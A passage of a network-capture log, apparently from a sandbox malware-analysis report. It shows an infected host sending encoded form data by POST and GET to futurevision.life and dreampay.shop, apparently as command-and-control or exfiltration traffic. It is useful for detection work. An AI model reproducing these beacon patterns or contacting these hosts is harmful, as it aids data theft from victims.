61 6c 33 69 39 56 35 4d 2f 6d 61 57 32 72 70 74 77 32 39 61 52 43 54 77 54 71 45 78 42 2b 2f 61 4f 76 53 33 2b 50 6a 46 4d 32 65 6f 54 49 37 50 43 55 39 76 63 7a 45 34 48 79 57 52 42 31 41 3d 3d Data Ascii: mRu=/dZgz2HIhZFxdkp1H4tPu3YELeP0m3UF3qbSjNWnY9L9DDpX2odAoJxsycyUhRzc6hFMa7XqGG6hAHlImIqebRmbKkwFulPiFWW50zhbxXIcNX+Pu4HaEkZ2O+7vPeoYPFYal3i9V5M/maW2rptw29aRCTwTqExB+/aOvS3+PjFM2eoTI7PCU9vczE4HyWRB1A==
Nov 12, 2024 15:34:38.124049902 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:34:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.11.20	49798	203.161.49.193	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:40.654345036 CET	782	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 2f 39 44 69 5a 58 6e 61 31 41 72 4a 78 73 6d 4d 79 52 73 78 7a 62 36 68 49 7a 61 2b 76 71 47 47 75 68 41 47 56 49 6d 59 57 52 62 42 6d 5a 66 55 77 48 67 46 50 69 46 57 57 35 30 79 46 39 78 58 77 63 4e 6e 75 50 38 4b 76 56 48 6b 5a 35 65 75 37 76 4c 65 6f 55 50 46 59 38 6c 31 58 61 56 37 45 2f 6d 66 71 32 6f 38 42 33 38 39 62 59 50 7a 78 45 6b 6e 6f 4a 79 37 36 47 35 79 48 4f 44 52 4e 62 7a 49 6c 4a 56 4a 37 6d 58 75 7a 75 33 30 42 76 77 55 51 61 6f 46 68 41 51 4b 61 6d 73 72 52 31 71 78 4b 6f 58 35 62 39 53 5a 6f 3d Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZP/9DiZXna1ArJxsmMyRsxzb6hIza+vqGGuhAGVImYWRbBmZfUwHgFPiFWW50yF9xXwcNnuP8KvVHkZ5eu7vLeoUPFY8l1XaV7E/mfq2o8B389bYPzxEknoJy76G5yHODRNbzIlJVJ7mXuzu30BvwUQaoFhAQKamsrR1qxKoX5b9SZo=
Nov 12, 2024 15:34:40.832247972 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:34:40 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.11.20	49799	203.161.49.193	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:43.361594915 CET	5156	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 48 39 44 52 42 58 32 4d 39 41 71 4a 78 73 6c 4d 79 51 73 78 79 48 36 68 51 2f 61 2b 71 49 47 43 65 68 41 6b 4e 49 79 37 4f 52 55 42 6d 5a 64 55 77 45 75 6c 4f 67 46 51 32 31 30 79 56 39 78 58 77 63 4e 68 71 50 73 49 48 56 4c 45 5a 32 4f 2b 37 64 50 65 70 39 50 46 41 43 6c 31 53 74 55 50 49 2f 6d 37 32 32 34 61 56 33 30 39 62 57 49 7a 78 4d 6b 6e 55 47 79 2f 61 38 35 79 79 68 44 53 39 62 2f 4d 4d 71 50 61 2f 67 42 4d 33 56 33 6b 56 72 79 45 77 4f 32 58 70 2f 62 4d 4f 59 75 62 78 37 6b 54 57 35 49 37 57 37 4d 5a 42 7a 73 58 73 79 41 6d 6e 77 65 68 78 56 55 52 73 71 78 64 4f 32 32 36 6c 31 31 45 4d 5a 34 49 38 39 74 4a 65 37 57 73 4d 4d 76 70 65 5a 49 67 55 76 39 56 36 47 65 4a 79 43 4f 44 4d 7a 34 66 67 32 74 4c 73 51 2b 32 39 38 5a 67 79 63 2b 41 50 53 34 36 58 41 77 67 51 59 4e 59 70 6c 46 57 2b 6b 6f 58 74 42 61 48 74 49 69 55 57 34 7a 49 75 75 45 35 56 4d 6e 67 [TRUNCATED] Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZPH9DRBX2M9AqJxslMyQsxyH6hQ/a+qIGCehAkNIy7ORUBmZdUwEulOgFQ210yV9xXwcNhqPsIHVLEZ2O+7dPep9PFACl1StUPI/m7224aV309bWIzxMknUGy/a85yyhDS9b/MMqPa/gBM3V3kVryEwO2Xp/bMOYubx7kTW5I7W7MZBzsXsyAmnwehxVURsqxdO226l11EMZ4I89tJe7WsMMvpeZIgUv9V6GeJyCODMz4fg2tLsQ+298Zgyc+APS46XAwgQYNYplFW+koXtBaHtIiUW4zIuuE5VMng8wWQY/wcbf9YFQmdUbndFDrUyM+60QP4VlzeoN+FAZuY8aFywo3590bnv+ztbRp3N6Mg9X3pyBgr/ofeyh3owJXE66WfoL4LEBifKcv5USdxK6sCeYoqH2VqWJaDCHnKIWa1GSO6a5ljnRrhsJ+ElnSXcYpmwSWKQ6xdEGsZA0OS4xhmXJLqZNtGyYeVRzKNMHYRvJgbpD27k/YH23Ix5g9H3HbrdLMuNN/xJWZ3e1p1Alc+lcSINWeJ+uUu7Ucgdo9knqoBoc+/9EbRP0SBa4F2n2cSUZ8qOSqSl6SPaOq5ypjIHgN2RH6QCrxaCG4pBPD3lWXPO0RyfPB2vkWx2IQsDfeOji7VVqiBBjc7P8IaiGCAnptc4o6N+rbyIuHgamd7R2WwJGJm9YmgFSkrKLC0iSphOtJ0WLI5m57sl/Y2AAWBC7ZOuFv5jUP4mdjZ7H7YEwHIw/evOZpP8px23KzlYEren73r13u26rgM6bvbbxu6HXPcRbjEsEWobqGnxxtCyYCd2q/gM5HVSoYyvSnTnPhO91WCXMk82b07MjFIFLGAAFtCcoBHdgNvQoIWEm9EUzDOi5/2kNAIaIwsGrMtP91MVy8fuBxXicuFqBVxhl/vnFaOw3l5V/aqbHp2SJCv+GisuEXp/KQaDz9VylIAeuY0z+GP8d [TRUNCATED]
Nov 12, 2024 15:34:43.361666918 CET	2775	OUT	Data Raw: 41 2f 57 44 39 42 39 4f 4d 6b 6f 69 50 76 78 38 48 45 51 53 52 30 69 41 2f 53 2b 37 4f 58 4c 52 76 55 37 77 6e 4e 59 52 50 6e 37 67 41 45 66 4f 65 73 6f 74 57 72 51 71 58 49 45 36 57 6a 41 38 35 54 7a 56 73 2f 50 6e 49 62 62 31 53 73 69 39 6e 4a Data Ascii: A/WD9B9OMkoiPvx8HEQSR0iA/S+7OXLRvU7wnNYRPn7gAEfOesotWrQqXIE6WjA85TzVs/PnIbb1Ssi9nJK49xx5sfmsuWLFDfUeDEpiWSxN5aK4VUeW0ZLlDKLOaue5oRCGWquOOlqelnTlc9tELENbkHXH2Rrzt4dHBdKvxVG5UQVt1/Qqz+6ciavKomGJX4q1vaimsjcyB9aJAqfPpV3kL6DHbqvHsdQ96WEO75j/LGSmKzC
Nov 12, 2024 15:34:43.554152966 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:34:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.11.20	49800	203.161.49.193	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:46.076700926 CET	480	OUT	GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:34:46.269095898 CET	548	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:34:46 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.11.20	49801	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:51.425786018 CET	750	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 54 38 41 75 72 4e 34 48 57 6e 4d 6b 78 36 4e 35 4a 74 32 55 32 67 33 47 63 76 55 43 68 49 75 48 50 32 37 51 6f 6b 63 4d 47 4c 38 58 50 45 64 70 69 58 35 77 5a 52 4a 49 6e 37 31 4b 4d 69 65 6e 6f 54 4a 65 36 61 48 72 74 75 46 43 63 75 4f 7a 61 77 56 30 38 66 35 78 44 53 41 65 4b 59 4f 33 64 79 4b 71 75 4c 55 30 51 4f 6d 76 6f 69 4a 41 36 66 78 61 45 30 2b 68 61 56 47 48 44 75 57 74 4a 57 30 42 4a 59 48 70 41 70 51 67 43 58 50 32 39 44 62 4b 49 68 58 70 79 48 30 44 6a 36 79 4c 41 32 4e 64 35 30 43 76 36 62 6b 44 37 54 52 68 55 45 2f 74 73 51 3d 3d Data Ascii: mRu=LPwHkIfPMUlaT8AurN4HWnMkx6N5Jt2U2g3GcvUChIuHP27QokcMGL8XPEdpiX5wZRJIn71KMienoTJe6aHrtuFCcuOzawV08f5xDSAeKYO3dyKquLU0QOmvoiJA6fxaE0+haVGHDuWtJW0BJYHpApQgCXP29DbKIhXpyH0Dj6yLA2Nd50Cv6bkD7TRhUE/tsQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.11.20	49802	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:54.096358061 CET	770	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 47 48 49 55 54 51 72 6c 63 4d 42 4c 38 58 58 55 64 6f 6d 58 35 37 5a 52 30 39 6e 2b 56 4b 4d 6d 2b 6e 6f 58 4e 65 36 74 72 6f 72 2b 46 41 58 4f 4f 4c 56 51 56 30 38 66 35 78 44 53 45 30 4b 59 47 33 64 42 43 71 38 35 38 33 54 4f 6d 75 76 69 4a 41 72 50 77 52 45 30 2f 4d 61 58 2b 68 44 74 75 74 4a 55 73 42 48 71 6a 75 50 70 51 6d 47 58 50 6b 39 52 6e 47 50 51 76 64 33 52 34 2f 75 71 6d 72 46 67 41 48 6b 47 32 4c 35 49 34 78 2f 6a 6f 4a 57 47 2b 32 78 66 70 31 31 6b 35 58 45 68 56 4d 43 59 6d 4d 56 47 71 50 68 66 45 3d Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg+GHIUTQrlcMBL8XXUdomX57ZR09n+VKMm+noXNe6tror+FAXOOLVQV08f5xDSE0KYG3dBCq8583TOmuviJArPwRE0/MaX+hDtutJUsBHqjuPpQmGXPk9RnGPQvd3R4/uqmrFgAHkG2L5I4x/joJWG+2xfp11k5XEhVMCYmMVGqPhfE=

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.11.20	49803	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:56.777841091 CET	2578	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 2b 48 50 6e 72 51 74 32 6b 4d 41 4c 38 58 4a 45 64 6c 6d 58 35 6d 5a 52 73 35 6e 2b 4a 38 4d 67 79 6e 70 79 5a 65 38 59 66 6f 69 2b 46 41 59 75 4f 77 61 77 56 62 38 66 70 4c 44 53 30 30 4b 59 47 33 64 48 6d 71 2f 72 55 33 56 4f 6d 76 6f 69 4a 4d 36 66 78 32 45 30 6d 35 61 58 37 63 43 63 4f 74 49 30 38 42 4b 35 48 75 47 70 51 6b 4c 33 4f 33 39 52 71 59 50 54 62 37 33 55 74 59 75 72 2b 72 4a 56 6c 44 37 47 2f 53 6d 6f 41 50 35 43 49 57 42 45 75 78 30 73 52 55 6c 6b 78 35 50 55 52 35 4e 49 6e 45 49 56 75 50 30 4b 2f 43 61 54 34 50 75 44 6b 4f 45 64 70 63 45 33 42 42 32 32 47 46 31 45 68 55 4d 6f 72 56 56 39 64 6e 6c 78 6f 38 70 50 43 6c 72 75 78 4b 6e 38 77 74 4a 56 33 73 5a 45 75 2b 4a 33 31 63 36 77 45 78 2b 2b 66 78 63 6a 48 4e 68 34 70 51 30 71 2b 56 44 57 51 2b 70 6b 75 2b 2b 74 4b 51 30 6f 63 38 52 4f 58 53 65 67 50 53 43 6b 68 63 68 78 5a 46 2b 6a 65 4c 6c 59 [TRUNCATED] Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg++HPnrQt2kMAL8XJEdlmX5mZRs5n+J8MgynpyZe8Yfoi+FAYuOwawVb8fpLDS00KYG3dHmq/rU3VOmvoiJM6fx2E0m5aX7cCcOtI08BK5HuGpQkL3O39RqYPTb73UtYur+rJVlD7G/SmoAP5CIWBEux0sRUlkx5PUR5NInEIVuP0K/CaT4PuDkOEdpcE3BB22GF1EhUMorVV9dnlxo8pPClruxKn8wtJV3sZEu+J31c6wEx++fxcjHNh4pQ0q+VDWQ+pku++tKQ0oc8ROXSegPSCkhchxZF+jeLlYFkE314KeBwgTw1NOT5T9zvzkGlQroOUN3ee6cieFHT85YMug3OUfUXBDsHTYiAFmNOFFJpaLN9IFQTwRa340/W9jqIYy6SByu3X+B1tRKFLTsgYBEpIWsCT3KYGb4lTfQoJTXngHmasIPabPQn2oVQJll2H0XpS2ZCnPKxLtRB8YzFP3Sg5anPbjPKWktICB4ZbXL77MQB0m1aHQ3u6pOzdl2614XHW69H5WodGlOob2LHLJEHxvAaeOKgoNoVcRKvD0qYl48AGsJ+ophGGMDu5TMpqQ8WfCIdzImuiOutbdIsTZyyEJz4/Ubf2QU4zAp7W2tPE9vEXXWt2CrCzcJlAY/elsmlFi+/eK9LffHQDolwgDRpLVWL4Ceu4UEX79HSupVmO8yCPHtVIek16K3fmglkTJdOeC3Hs1cg5mxKxogXEuEIcaFwHq/JxrD0vE4QCZD894E08Z72nuqzTVI7ujItaurk63QB3FXwoNBEzODBML/l8pzliFibj1UfsmjqSSb1/58/rVEx7blWlH73tF9AO+F0RpHEkaTaAt4MEbz2tOzUGwewNxqjStgA1yF2COfjDkl0Kbi02fHhwNl5bq+vdC2oftE8IwOTD3qVwNvN0BbDBwMNQolnBTBm4zpzZC5fRlLCGOwjmQOLvZe2n61P3p2LJ6IU [TRUNCATED]
Nov 12, 2024 15:34:56.777877092 CET	5341	OUT	Data Raw: 75 53 44 71 73 71 78 38 6a 6f 68 56 56 37 73 69 57 56 66 58 42 39 37 2f 30 39 73 65 2b 4e 43 52 4e 67 6b 53 6e 55 55 33 57 75 62 68 76 44 59 77 4d 70 66 53 63 64 2f 34 69 79 6d 45 75 76 61 47 57 38 62 38 71 58 65 63 56 59 65 41 75 34 46 35 7a 37 Data Ascii: uSDqsqx8johVV7siWVfXB97/09se+NCRNgkSnUU3WubhvDYwMpfScd/4iymEuvaGW8b8qXecVYeAu4F5z7O3Q5JNLTuZlmkdjBDP5IIvq0iliDZsbfPsGzt+zXyF0rpTTB7NnInVeWyIRoc4ASl65MhSDdcPR70jxRAxL/Erg4HPSO9GaS1Z62TSqBMyfjJSrb+DBHqVLospLwDDIYK60w/Vj5AsNZldnQMBKvCTEGKjnbsZVEY

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.11.20	49804	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:59.452414036 CET	476	OUT	GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:34:59.588041067 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:34:59 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 47 4e 59 6e 6e 2b 2f 48 64 79 56 38 64 75 52 4d 71 74 63 79 58 6d 30 78 79 36 41 35 52 37 4f 50 30 67 33 71 51 73 78 6c 69 2b 72 63 49 57 54 31 34 7a 52 55 44 71 67 78 4e 52 41 7a 6f 6c 63 65 63 48 38 79 75 39 41 4b 4b 41 61 6b 34 53 64 53 79 5a 36 52 76 49 64 41 56 74 32 51 55 54 31 49 77 4e 6c 50 42 41 6f 43 64 38 43 78 58 68 66 38 75 75 59 72 56 4e 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.11.20	49805	173.255.194.134	80

Timestamp	Bytes transferred	Direction	Data
